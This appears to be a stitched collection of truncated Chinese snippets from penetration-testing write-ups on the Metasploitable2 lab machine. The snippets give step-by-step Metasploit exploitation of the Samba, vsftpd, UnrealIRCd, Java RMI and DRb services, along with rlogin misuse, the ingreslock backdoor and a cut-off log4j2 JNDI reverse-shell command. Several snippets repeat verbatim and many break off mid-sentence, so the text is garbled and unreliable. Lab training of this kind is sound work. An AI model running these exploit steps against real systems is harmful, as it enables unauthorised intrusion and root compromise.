攻击机:kali linux IP:192.168.1.133 靶机:Metasploitable2 IP:192.168.1.131 1、启动数据库并且打开metasploit控制台:msfconsole 2、搜索可利用的模块:search samba 3、选择要利用的模块:use exploit/multi/samba/usermap_script 查看需要设置的参数:show options 需要设置目标ip和端口(默认139) 4、设置目标主机地址:...
寻找ftp2.3.4版本的漏洞,然后使用这个漏洞exploit/unix/ftp/proftpd_133c_backdoor(在未经身份验证的情况下获取 root 权限) 到此成功利用ftp漏洞获取了靶机的shell。 ssh(22) 探测ssh版本信息(auxiliary/scanner/ssh/ssh_version) 针对版本4.7漏洞,找到了一些,但是尝试,有的需要的东西太繁琐了,有的失败了,这里还是...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 5、查看目标主机目录文件:ls 上...
6667端口6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell 使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor 8180端口:暴力破解账号密码:tomcat;tomcat 8787端口drb服务,有个远程代码执行漏洞 使用模块:use exploit/linux/misc/drb_remote_codeexec Metasploitable2靶机渗透总结: 自此大概的漏洞基...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
situation). To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH...
因为之前端口扫描的时候,存在一个80端口开放,并且这是个web,而且这是我搭建的存在apache log4j2的漏洞 抓包测试判断是否存在log4j2漏洞测试存在log4j2漏洞,接下来构造反弹shell的payload(利用别人已经构造的ext)。 JNDI注入工具的语句格式:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “...
TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts + +)。要利用这个配置,确保rsh客户端已经安装(在ubuntu上),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH。
使用:use exploit/multi/misc/java_rmi_server 设置好参数 然后执行 就会有一个会话 然后 切换会话即可。 1524端口: 在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。